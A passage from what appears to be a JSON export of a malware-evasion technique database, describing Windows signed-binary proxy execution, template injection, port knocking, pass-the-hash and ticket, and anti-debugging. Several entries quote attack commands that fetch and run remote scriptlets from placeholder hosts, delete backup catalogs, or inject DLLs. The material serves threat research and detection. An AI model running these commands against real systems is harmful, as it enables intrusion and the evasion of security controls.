"description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\r\n\r\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. Similar to Regsvr32 / \"Squiblydoo\", CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.\r\n\r\nCMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.",
"resources": "https://attack.mitre.org/techniques/T1218/003/",
"creation_date": "2023-03-04T23:30:50.977000Z",
"tags": "Defense Evasion,\r\nMicrosoft Connection Manager Profile Installer (CMSTP.exe),\r\nINF files,\r\nmalicious COM scriptlets (SCT),\r\nmalicious DLLs,\r\nbypass AppLocker,\r\nBypass User Account Control,",
"modification_date": "2023-10-04T10:44:22.436000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 322,
"key": "system-binary-proxy-execution-installutil",
"unprotect_id": "T1218.004",
"name": "System Binary Proxy Execution: InstallUtil",
"description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\r\n\r\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)].",
"resources": "https://attack.mitre.org/techniques/T1218/004/",
"creation_date": "2023-03-04T23:43:22.555000Z",
"tags": "Defense Evasion,\r\nC:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe,\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe,\r\n[System.ComponentModel.RunInstaller(true)],\r\ndisable Windows Defender,\r\nexecute malicious code,",
"modification_date": "2023-10-04T10:44:22.675000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 323,
"key": "system-binary-proxy-execution-mshta",
"unprotect_id": "T1218.005",
"name": "System Binary Proxy Execution: Mshta",
"description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code.\r\n\r\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.\r\n\r\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\r\n\r\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\r\n\r\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.",
"resources": "https://attack.mitre.org/techniques/T1218/005/",
"creation_date": "2023-03-04T23:47:38.933000Z",
"tags": "Defense Evasion,\r\nmshta.exe,\r\nMicrosoft HTML Applications (HTA) files,\r\nJavaScript,\r\nVBScript,\r\nmshta http[:]//webserver/payload[.]hta,\r\nmshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\")),\r\nbypass application control,\r\nbypass browser security settings,\r\nAPT29,\r\nAPT32,\r\nexecute malicious scripts,",
"modification_date": "2023-10-04T10:43:29.549000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 324,
"key": "system-binary-proxy-execution-msiexec",
"unprotect_id": "T1218.007",
"name": "System Binary Proxy Execution: Msiexec",
"description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi). The Msiexec.exe binary may also be digitally signed by Microsoft.\r\n\r\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs. Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.",
"resources": "https://attack.mitre.org/techniques/T1218/007/",
"creation_date": "2023-03-04T23:52:27.696000Z",
"tags": "Defense Evasion,\r\nmalicious installation packages (.msi),\r\nmalicious DLLs,\r\nbypass application control solutions,\r\nprivilege escalation,\r\nAlwaysInstallElevated,",
"modification_date": "2023-10-04T10:44:22.823000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 325,
"key": "system-binary-proxy-execution-odbcconf",
"unprotect_id": "T1218.008",
"name": "System Binary Proxy Execution: Odbcconf",
"description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names. The Odbcconf.exe binary may be digitally signed by Microsoft.\r\n\r\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to Regsvr32, odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"})",
"resources": "https://attack.mitre.org/techniques/T1218/008/",
"creation_date": "2023-03-05T00:02:22.858000Z",
"tags": "Defense Evasion,\r\nOpen Database Connectivity (ODBC),\r\nbypass application control solutions,\r\nREGSVR,\r\nexecution of malicious DLL files,",
"modification_date": "2023-10-04T10:43:30.090000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 326,
"key": "system-binary-proxy-execution-regsvcsregasm",
"unprotect_id": "T1218.009",
"name": "System Binary Proxy Execution: Regsvcs/Regasm",
"description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. \r\n\r\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute",
"resources": "https://attack.mitre.org/techniques/T1218/009/",
"creation_date": "2023-03-05T00:09:28.754000Z",
"tags": "Defense Evasion,\r\nregister .NET Component Object Model (COM) assemblies,\r\nbypass application control,\r\n[ComRegisterFunction],\r\n[ComUnregisterFunction],",
"modification_date": "2023-10-04T10:44:23.084000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 327,
"key": "system-binary-proxy-execution-regsvr32",
"unprotect_id": "T1218.010",
"name": "System Binary Proxy Execution: Regsvr32",
"description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. \r\n\r\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. This variation of the technique is often referred to as a \"Squiblydoo\" and has been used in campaigns targeting governments.\r\n\r\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking.",
"resources": "https://attack.mitre.org/techniques/T1218/010/",
"creation_date": "2023-03-05T00:14:46.485000Z",
"tags": "Defense Evasion,\r\nbypass application control,\r\nload COM scriptlets,\r\nexecute DLLs,\r\nuniform resource locator (URL),\r\nexternal web server,\r\nSquiblydoo,\r\nComponent Object Model Hijacking,\r\nAPT19,\r\nAPT32,\r\nmaintain persistence,\r\nexecute malicious code,\r\nexecute malicious DLLs,\r\nexecute malicious scripts,",
"modification_date": "2023-10-04T10:43:31.131000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 328,
"key": "system-binary-proxy-execution-rundll32",
"unprotect_id": "T1218.011",
"name": "System Binary Proxy Execution: Rundll32",
"description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\r\n\r\nRundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.\r\n\r\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. \r\n\r\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones. DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).\r\n\r\nAdditionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.",
"resources": "https://attack.mitre.org/techniques/T1218/011/",
"creation_date": "2023-03-05T00:24:36.312000Z",
"tags": "Defense Evasion,\r\nrundll32.exe {DLLname, DLLfunction},\r\nexecute Control Panel Item files (.cpl),\r\nControl_RunDLL, Control_RunDLLAsUser,\r\nrundll32.exe javascript:\r\nobfuscate malicious code,\r\nMasquerading,\r\nAPT19,\r\nAPT28,\r\nAPT29,\r\nAPT3,\r\nAPT32,\r\nAPT38\r\nAPT41,\r\nmaintain persistence,\r\ninject malicious payload,\r\nexecute malicious DLLs,",
"modification_date": "2023-10-04T10:44:23.236000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 329,
"key": "system-binary-proxy-execution-verclsid",
"unprotect_id": "T1218.012",
"name": "System Binary Proxy Execution: Verclsid",
"description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.\r\n\r\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to Regsvr32). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.",
"resources": "https://attack.mitre.org/techniques/T1218/012/",
"creation_date": "2023-03-05T00:27:25.765000Z",
"tags": "Defense Evasion,\r\nverclsid.exe,\r\nExtension CLSID Verification Host,\r\nverifying shell extensions,\r\nexecute malicious payloads,\r\nverclsid.exe /S /C {CLSID},\r\nCOM objects,\r\nbypass application control solutions,\r\ndownload malicious scripts,\r\nexecute malicious scripts,",
"modification_date": "2023-10-04T10:43:31.280000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 330,
"key": "system-binary-proxy-execution-mavinject",
"unprotect_id": "T1218.013",
"name": "System Binary Proxy Execution: Mavinject",
"description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).\r\n\r\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. Dynamic-link Library Injection), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL). Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.\r\n\r\nIn addition to Dynamic-link Library Injection, Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.",
"resources": "https://attack.mitre.org/techniques/T1218/013/",
"creation_date": "2023-03-05T00:51:58.680000Z",
"tags": "Defense Evasion,\r\nmavinject.exe,\r\nMicrosoft Application Virtualization Injector,\r\ninject code into external processes,\r\nproxying execution,\r\n/HMODULE,\r\nmavinject.exe PID /INJECTRUNNING,",
"modification_date": "2023-10-04T10:43:34.060000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 331,
"key": "system-binary-proxy-execution-mmc",
"unprotect_id": "T1218.014",
"name": "System Binary Proxy Execution: MMC",
"description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt. MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.\r\n\r\nFor example, mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved console msc file in author mode. Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window.\r\n\r\nAdversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. Inhibit System Recovery) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).\r\n\r\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a Component Object Model class object.[6] Then, adversaries may create custom consoles with the \"Link to Web Address\" snap-in that is linked to the malicious CLSID subkey.[7] Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc",
"resources": "https://attack.mitre.org/techniques/T1218/014/",
"creation_date": "2023-03-05T00:58:16.050000Z",
"tags": "Defense Evasion,\r\n.msc files,\r\nMicrosoft Management Console (MMC),\r\nsnap-ins,\r\nmmc gpedit.msc,\r\nmmc C:\\Users\\*\\admintools.msc /a,\r\nmmc.exe -Embedding,\r\nInhibit System Recovery,\r\nClass Identifier (CLSID) subkey,\r\nComponent Object Model class object,\r\nLink to Web Address,",
"modification_date": "2023-10-04T10:44:29.845000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 332,
"key": "system-script-proxy-execution-pubprn",
"unprotect_id": "T1216.001",
"name": "System Script Proxy Execution: PubPrn",
"description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.\r\n\r\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites. To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\r\n\r\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).",
"resources": "https://attack.mitre.org/techniques/T1216/001/",
"creation_date": "2023-03-07T03:44:50.264000Z",
"tags": "Defense Evasion,\r\nproxy execution of malicious remote files,\r\nPubPrn.vbs,\r\nCscript.exe,\r\nexecute malicious remote payloads,\r\nscript: parameter,\r\nscriptlet file (.sct),\r\nbypass signature validation restrictions,\r\nbypass application control solutions,\r\nAPT32,",
"modification_date": "2023-10-04T10:44:23.698000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 333,
"key": "template-injection",
"unprotect_id": "T1221",
"name": "Template Injection",
"description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.\r\n\r\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\r\n\r\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. These documents can be delivered via other techniques such as Phishing and/or Taint Shared Content and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.\r\n\r\nAdversaries may also modify the *\\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.\r\n\r\nThis technique may also enable Forced Authentication by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt",
"resources": "https://attack.mitre.org/techniques/T1221/",
"creation_date": "2023-03-07T03:50:18.208000Z",
"tags": "Defense Evasion,\r\n.docx, \r\n.xlsx, \r\n.pptx, \r\n.dot,\r\nconceal malicious code in documents,\r\ndocument injection,\r\n*\\template control word,\r\n.rtf file,\r\nForced Authentication,\r\nAPT28,\r\nmalicious macros,",
"modification_date": "2023-10-04T10:44:29.999000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 334,
"key": "traffic-signaling-port-knocking",
"unprotect_id": "T1205.001",
"name": "Traffic Signaling: Port Knocking",
"description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\r\n\r\nThis technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\r\n\r\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
"resources": "https://attack.mitre.org/techniques/T1205/001/",
"creation_date": "2023-03-07T03:54:15.801000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nCommand and Control,\r\nhide open ports,\r\ndynamic opening of a listening port,\r\nconnection to listening servers,\r\nlibpcap libraries,\r\nraw sockets,",
"modification_date": "2023-10-04T10:44:23.953000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 335,
"key": "traffic-signaling-socket-filters",
"unprotect_id": "T1205.002",
"name": "Traffic Signaling: Socket Filters",
"description": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the libpcap library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.\r\n\r\nTo establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria. Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with Protocol Tunneling.\r\n\r\nFilters can be installed on Windows hosts using Winpcap.",
"resources": "https://attack.mitre.org/techniques/T1205/002/",
"creation_date": "2023-03-07T03:59:35.951000Z",
"tags": "Defense Evasion, \r\nPersistence, \r\nCommand and Control,\r\nnetwork socket filtering,\r\nactivate backdoors,\r\nWinpcap,\r\nProtocol Tunneling,\r\nraw socket connections,",
"modification_date": "2023-10-04T10:43:35.310000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 336,
"key": "trusted-developer-utilities-proxy-execution-msbuild",
"unprotect_id": "T1127.001",
"name": "Trusted Developer Utilities Proxy Execution: MSBuild",
"description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.\r\n\r\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution",
"resources": "https://attack.mitre.org/techniques/T1127/001/",
"creation_date": "2023-03-07T04:04:33.351000Z",
"tags": "Defense Evasion,\r\nproxy execution of malicious code,\r\nMSBuild.exe (Microsoft Build Engine),\r\nexecute arbitrary code,\r\nbypass application control defenses,\r\n.NET Framework 4,",
"modification_date": "2023-10-04T10:44:15.323000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 337,
"key": "use-alternate-authentication-material-pass-the-hash",
"unprotect_id": "T1550.002",
"name": "Use Alternate Authentication Material: Pass the Hash",
"description": "Adversaries may \"pass the hash\" using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\r\n\r\nWhen performing PtH, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\r\n\r\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform Pass the Ticket attacks",
"resources": "https://attack.mitre.org/techniques/T1550/002/",
"creation_date": "2023-03-07T04:08:51.289000Z",
"tags": "Defense Evasion, \r\nLateral Movement,\r\nstolen password hashes,\r\nbypass system access controls,\r\nbypass standard authentication steps,\r\nPtH,\r\nCredential Access,\r\noverpass the hash,\r\nKerberos ticket,\r\nPass the Ticket,\r\nAPT1,\r\nAPT28,\r\nAPT32,",
"modification_date": "2023-10-04T10:44:24.203000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 338,
"key": "use-alternate-authentication-material-pass-the-ticket",
"unprotect_id": "T1550.003",
"name": "Use Alternate Authentication Material: Pass the Ticket",
"description": "Adversaries may \"pass the ticket\" using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\r\n\r\nWhen preforming PtT, valid Kerberos tickets for Valid Accounts are captured by OS Credential Dumping. A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.\r\n\r\nA Silver Ticket can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).\r\n\r\nA Golden Ticket can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.\r\n\r\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. Pass the Hash) while also using the password hash to create a valid Kerberos ticket",
"resources": "https://attack.mitre.org/techniques/T1550/003/",
"creation_date": "2023-03-07T04:14:30.236000Z",
"tags": "Defense Evasion, \r\nLateral Movement,\r\nstolen password hashes,\r\nstolen AES keys,\r\nbypass system access controls,\r\nKerberos authentication,\r\nPtT,\r\nOS Credential Dumping,\r\nTicket Granting Ticket (TGT),\r\nTicket Granting Service (TGS),\r\nSilver Ticket,\r\nGolden Ticket,\r\nKey Distribution Service account KRBTGT account NTLM hash,\r\nKerberos ticket,\r\noverpassing the hash,\r\nPass the Hash,\r\nAPT28,\r\nAPT32,",
"modification_date": "2023-10-04T10:43:42.393000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 339,
"key": "call-to-interrupt-procedure",
"unprotect_id": "U0124",
"name": "Call to Interrupt Procedure",
"description": "This anti-debugging technique involves using the `INT n` instruction to generate a call to the interrupt or exception handler specified with the destination operand.\r\n\r\nTo implement this technique, the int `0x03` instruction is executed, followed by a `ret` (0xCD03, 0xC3) nested in a `__try, __except block`. If a debugger is present, the except block will not be executed, and the function will return TRUE, indicating that a debugger is running.\r\n\r\nThis technique can be used to prevent analysts from analyzing and manipulating the malware's code during runtime.",
"resources": "http://www.nacad.ufrj.br/online/intel/vtune/users_guide/mergedProjects/analyzer_ec/mergedProjects/reference_olh/mergedProjects/instructions/instruct32_hh/vc140.htm",
"creation_date": "2023-03-10T02:29:39.347000Z",
"tags": "Anti-debugging, X86 instruction, RET",
"modification_date": "2023-10-04T10:44:25.147000Z",
"category": [
3
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 340,
"key": "addvectoredexceptionhandler",
"unprotect_id": "U0125",
"name": "AddVectoredExceptionHandler",
"description": "The `AddVectoredExceptionHandler` technique is an anti-debugging method that can detect the presence of debuggers using Vectored Exception Handlers. This technique works by calling `AddVectoredExceptionHandler(1, ourHandler)` to register a top-level exception handler that will catch any exceptions raised by the process, including those generated by debuggers.\r\n\r\nAfter this call has taken place, stepping through the code will trigger an `EXCEPTION_SINGLE_STEP` exception, which is caught by our top-level handler. This exception is typically only generated by debuggers and is therefore a strong indicator that a debugger is present.",
"resources": "https://learn.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-addvectoredexceptionhandler",
"creation_date": "2023-03-10T02:40:20.368000Z",
"tags": "Anti-debugging, Vectored Exception Handlers, AddVectoredExceptionHandler, Debugging, Exception handling, EXCEPTION_SINGLE_STEP",
"modification_date": "2023-10-04T10:44:23.409000Z",
"category": [
3
],
"rules": [],
"attachments": [],
"featured_api": [
593
],
"contributors": []
},
{
"id": 341,
"key": "unloading-module-with-freelibrary",
"unprotect_id": "U0519",
"name": "Unloading Module with FreeLibrary",
"description": "Malware authors often use various techniques to evade detection by AV/EDR solutions. One such technique involves checking for the presence of AV/EDR DLLs that may be loaded in the malware's address space and attempting to unload them before executing their malicious code.\r\n\r\nTo do this, the malware first uses the `GetModuleHandleA` function to retrieve a handle to the DLL, if it's already loaded. Once it has a valid handle, the malware then calls the `FreeLibrary` function to free and unload the DLL from memory.\r\n\r\nBy unloading the AV/EDR DLL, the malware can avoid detection and carry out its malicious activities without being monitored or blocked by the security software. However, it is important to note that this technique only affects user-mode components of an EDR and not kernel components. Additionally, modern EDR systems have evolved to detect such evasive techniques and prevent malware from disabling them.",
"resources": "http://malwarejake.blogspot.com/2013/07/interesting-malware-defense.html\nhttps://rstforums.com/forum/topic/110743-make-your-dynamic-module-unfreeable-anti-freelibrary/\nhttps://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/",
"creation_date": "2023-03-19T22:08:54.336000Z",
"tags": "Malware, AV/EDR, detection, DLL, address space, unload, GetModuleHandleA, FreeLibrary,",
"modification_date": "2023-10-04T10:44:48.899000Z",
"category": [
2
],
"rules": [
133
],
"attachments": [],
"featured_api": [
375,
376
],
"contributors": []
},
{
"id": 342,
"key": "constant-blinding",
"unprotect_id": "U0707",
"name": "Constant Blinding",
"description": "Constant blinding can be employed by malware authors to obfuscate their malicious code, making it harder for security researchers and antivirus software to detect and analyze the malware. By using constant blinding techniques, the malware code can be concealed, increasing its chances of evading detection and maintaining persistence on the target system.\r\n\r\nHere's how constant blinding can be utilized in malware:\r\n\r\n1. Obfuscating malicious constants: Malware may contain specific constants, such as IP addresses or URLs for command and control (C2) servers or specific strings used as encryption keys. By applying constant blinding, these constants can be hidden, making it difficult for researchers to identify the purpose of the constant or uncover the C2 infrastructure.\r\n\r\n2. Concealing code patterns: Antivirus software often relies on signature-based detection, which looks for known patterns of code within the executable. By applying constant blinding to the malware code, these recognizable patterns can be obscured, helping the malware evade signature-based detection.\r\n\r\n2. Hiding exploit payloads: In a multi-stage attack, constant blinding can be used to conceal the payload of an exploit. By XORing the payload with a randomly generated key, the true nature of the payload is hidden until it is executed on the target system, making it more challenging for security tools to identify the malicious payload.\r\n\r\n3. Encrypted communication: Constant blinding techniques can be used to encrypt communication between the malware and the C2 server. By XORing the data transmitted with a randomly generated key, the malware can protect the confidentiality of the communication and make it more challenging for researchers to intercept and analyze the data.",
"resources": "https://hal.inria.fr/hal-01382971/file/PID4513621.pdf",
"creation_date": "2023-03-19T23:46:54.952000Z",
